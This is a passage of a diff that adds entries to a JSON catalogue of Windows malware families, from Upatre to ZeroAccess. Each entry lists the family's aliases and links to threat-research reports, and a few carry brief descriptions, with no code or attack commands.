"https://secrary.com/ReversingMalware/Upatre/" + ] + }, + "uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0", + "value": "Upatre", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy" + ] + }, + "uuid": "5af4838f-1b4d-4f0b-bd27-50ef532e84f7", + "value": "Urausy", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bebloh", + "Shiotob" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone", + "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations", + "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", + "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", + "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/", + 
"https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", + "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/", + "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/" + ] + }, + "uuid": "ed9f995b-1b41-4b83-a978-d956670fdfbe", + "value": "UrlZone", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Snake" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos" + ] + }, + "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", + "value": "Uroburos", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Catch", + "grabnew", + "NeverQuest" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak", + "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/", + "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", + "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", + "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", + "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" + ] + }, + "uuid": "b662c253-5c87-4ae6-a30e-541db0845f67", + "value": "Vawtrak", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.velso", + "https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/" + ] + }, + "uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f", + "value": "Velso Ransomware", + "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. 
" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.venus_locker", + "https://twitter.com/JaromirHorejsi/status/813690129088937984" + ] + }, + "uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd", + "value": "Venus Locker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" + ] + }, + "uuid": "2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1", + "value": "Vermin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder", + "https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/" + ] + }, + "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", + "value": "Vflooder", + "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor", + "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" + ] + }, + "uuid": "30161733-993f-4a1c-bcc5-7b4f1cd7d9e4", + "value": "virdetdoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut", + "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/", + "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/" + ] + }, + "uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6", + "value": "Virut", + "description": "" + }, + { + "meta": { + "synonyms": [ + "VMzeus", + "ZeusVM", + "Zberp" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus", + "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", + "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/", + "https://asert.arbornetworks.com/wp-content/uploads/2015/08/ZeusVM_Bits_and_Pieces.pdf" + ] + }, + "uuid": "c32740a4-db2c-4d71-80bd-7377185f4a6f", + "value": "VM Zeus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus", + "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/" + ] + }, + "uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840", + "value": "Vobfus", + "description": "" + }, + { + "meta": { + "synonyms": [ + "FALLCHILL", + "Manuscrypt" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer", + "https://www.us-cert.gov/ncas/alerts/TA17-318B" + ] + }, + "uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f", + "value": 
"Volgmer",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vreikstadi",
+ "https://twitter.com/malware_traffic/status/821483557990318080"
+ ]
+ },
+ "uuid": "ab2a63f1-1afd-44e7-9cf4-c775dbee78f4",
+ "value": "Vreikstadi",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer",
+ "http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis",
+ "http://www.xylibox.com/2013/01/vskimmer.html",
+ "https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/"
+ ]
+ },
+ "uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8",
+ "value": "vSkimmer",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times",
+ "https://attack.mitre.org/wiki/Group/G0022"
+ ]
+ },
+ "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8",
+ "value": "w32times",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Wcry",
+ "WannaCry",
+ "Wana Decrypt0r"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor",
+ "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984",
+ "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today",
+ "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/",
+ "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign",
+ "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/",
+ "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/",
+ "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58",
+ 
"https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html",
+ "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e",
+ "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html",
+ "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168",
+ "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/",
+ "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d",
+ "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
+ "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/",
+ "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html"
+ ]
+ },
+ "uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6",
+ "value": "WannaCryptor",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer",
+ "https://blog.minerva-labs.com/waterminer-a-new-evasive-crypto-miner"
+ ]
+ },
+ "uuid": "d536931e-ad4f-485a-b93d-fe05f23a9367",
+ "value": "WaterMiner",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout",
+ "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html"
+ ]
+ },
+ "uuid": "d238262a-4832-408f-9926-a7174e671b50",
+ "value": "WaterSpout",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c",
+ "value": "WebC2-AdSpace",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "64f5ae85-1324-43de-ba3a-063785567be0",
+ "value": "WebC2-Ausov",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f",
+ "value": "WebC2-Bolid",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4",
+ "value": "WebC2-Cson",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "acdda3e5-e776-419b-b060-14f3406de061",
+ "value": "WebC2-DIV",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "cfed10ed-6601-469e-a1df-2d561b031244",
+ "value": "WebC2-GreenCat",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head",
+ 
"https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "f9f37707-36cf-4ad0-88e0-86f47cbe0ed6",
+ "value": "WebC2-Head",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "15094548-7555-43ee-8c0d-4557d6d8a087",
+ "value": "WebC2-Kt3",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "71d8ef43-3767-494b-afaa-f58aad70df65",
+ "value": "WebC2-Qbp",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c",
+ "value": "WebC2-Rave",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae",
+ "value": "WebC2-Table",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": 
"b459033c-2d19-49aa-a21f-44a01d1a4156",
+ "value": "WebC2-UGX",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e",
+ "value": "WebC2-Yahoo",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor",
+ "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/"
+ ]
+ },
+ "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4",
+ "value": "WebMonitor RAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess",
+ "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html"
+ ]
+ },
+ "uuid": "d84ebd91-58f6-459f-96a1-d028a1719914",
+ "value": "WellMess",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire",
+ "https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/"
+ ]
+ },
+ "uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2",
+ "value": "WildFire",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
+ "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
+ "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf"
+ ]
+ },
+ "uuid": "6a100902-7204-4f20-b838-545ed86d4428",
+ "value": "WinMM",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti",
+ 
"http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/",
+ "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html",
+ "https://github.com/TKCERT/winnti-nmap-script",
+ "https://github.com/TKCERT/winnti-suricata-lua",
+ "https://github.com/TKCERT/winnti-detector"
+ ]
+ },
+ "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1",
+ "value": "Winnti",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader",
+ "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/"
+ ]
+ },
+ "uuid": "db755407-4135-414c-90e3-97f5e48c6065",
+ "value": "Winsloader",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot",
+ "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf"
+ ]
+ },
+ "uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4",
+ "value": "Wipbot",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Wimmie",
+ "Syndicasec"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost",
+ "https://secrary.com/ReversingMalware/WMIGhost/",
+ "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets"
+ ]
+ },
+ "uuid": "892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40",
+ "value": "WMI Ghost",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest",
+ "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ ]
+ },
+ "uuid": "d8bf4ea1-054c-4a88-aa09-48da0d89c322",
+ "value": "WndTest",
+ 
"description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu",
+ "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/"
+ ]
+ },
+ "uuid": "bfa75eb1-1d8d-4127-932f-3b7090a242e9",
+ "value": "Wonknu",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody",
+ "https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814"
+ ]
+ },
+ "uuid": "42e23d17-8f1b-43c9-bc76-e3cf098b5c52",
+ "value": "woody",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "WoolenLogger"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger",
+ "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf"
+ ]
+ },
+ "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267",
+ "value": "Woolger",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "splm",
+ "chopstick"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent",
+ "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/",
+ "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
+ "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf"
+ ]
+ },
+ "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf",
+ "value": "X-Agent",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos",
+ "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html"
+ ]
+ },
+ "uuid": "c6467cc3-dafd-482e-881e-ef2e7e244436",
+ "value": "XBot POS",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl"
+ ]
+ },
+ "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed",
+ "value": "XBTL",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan",
+ "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/",
+ "https://securelist.com/blog/research/78110/xpan-i-am-your-father/"
+ ]
+ },
+ "uuid": "4da036c4-b76d-4f25-bc9e-3c5944ad0993",
+ "value": "Xpan",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Expectra"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra",
+ "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/",
+ "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis"
+ ]
+ },
+ "uuid": "5f9ba149-100a-46eb-a959-0645d872975b",
+ "value": "XPCTRA",
+ "description": "Incorporates code of Quasar RAT."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xp_privesc",
+ "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf"
+ ]
+ },
+ "uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae",
+ "value": "XP PrivEsc (CVE-2014-4076)",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "nokian"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
+ "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
+ "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf"
+ ]
+ },
+ "uuid": "b255fd2c-6ddb-452f-b660-c9f5d3a2ff63",
+ "value": "xsPlus",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "xaps"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
+ "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/",
+ "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf",
+ "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf",
+ "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/",
+ "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf"
+ ]
+ },
+ "uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74",
+ "value": "X-Tunnel",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "ShadowWalker"
+ ],
+ "type": [],
+ 
"refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm",
+ "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/"
+ ]
+ },
+ "uuid": "1d451231-8b27-4250-b3db-55c5c8ea99cb",
+ "value": "xxmm",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "KeyBoy"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah",
+ "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/"
+ ]
+ },
+ "uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8",
+ "value": "Yahoyah",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "bbsinfo",
+ "aumlib"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih",
+ "https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html"
+ ]
+ },
+ "uuid": "81157066-c2f6-4625-8070-c0a793d57e18",
+ "value": "yayih",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "DarkShare"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus",
+ "https://www.youtube.com/watch?v=AUGxYhE_CUY"
+ ]
+ },
+ "uuid": "1cc9d450-88cd-435c-bb74-8410d2d22571",
+ "value": "YoungLotus",
+ "description": "Simple malware with proxy/RDP and download capabilities. 
It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n"
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty",
+ "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/",
+ "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/"
+ ]
+ },
+ "uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200",
+ "value": "yty",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Zekapab"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy",
+ "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/",
+ "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/"
+ ]
+ },
+ "uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42",
+ "value": "Zebrocy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy_au3",
+ "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/"
+ ]
+ },
+ "uuid": "4a5f2088-18cb-426a-92e2-1eb752c294c0",
+ "value": "Zebrocy (AutoIT)",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou"
+ ]
+ },
+ "uuid": "2211eade-4980-4143-acd7-5ecda26d9dfa",
+ "value": "Zedhou",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Max++",
+ "Smiscer"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess",
+ "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/",
+ 
"https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/",
